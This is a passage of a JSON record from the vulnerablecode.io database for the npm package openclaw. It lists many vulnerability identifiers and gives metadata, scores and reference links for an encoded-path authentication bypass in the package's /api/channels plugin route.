:"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13-beta.1"}],"aliases":["GHSA-c447-w54g-f55j"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-44hp-3xh1-uyen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50538?format=json","vulnerability_id":"VCID-49b4-qwz6-q7he","summary":"OpenClaw has encoded-path auth bypass in plugin `/api/channels` route classification\nEncoded alternate-path requests could bypass plugin route auth checks for `/api/channels/*` due to canonicalization depth mismatch in vulnerable builds.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32004","reference_id":"","reference_type":"","scores":[{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22535","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22584","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22597","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32004"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2fd8264ab03bd178e62a5f0c50d1c8556c17f12d","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2fd8264ab03bd178e62a5f0c50d1c8556c17f12d"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a7eee920a176a0043398c6b37bf4cc6eb983eeb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7a7eee920a176a0043398c6b37bf4cc6eb983eeb"},{"reference_url":"https://github.com/openclaw/openclaw/commit/93b07240257919f770d1e263e1f22753937b80ea","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/93b07240257919f770d1e263e1f22753937b80ea"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d74bc257d8432f17e50b23ae713d7e0623a1fe0f","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d74bc257d8432f17e50b23ae713d7e0623a1fe0f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-encoded-path-in-api-channels-route","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-encoded-path-in-api-channels-route"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32004","reference_id":"CVE-2026-32004","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32004"},{"reference_url":"https://github.com/advisories/GHSA-v865-p3gq-hw6m","reference_id":"GHSA-v865-p3gq-hw6m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v865-p3gq-hw6m"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v865-p3gq-hw6m","reference_id":"GHSA-v865-p3gq-hw6m","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v865-p3gq-hw6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vul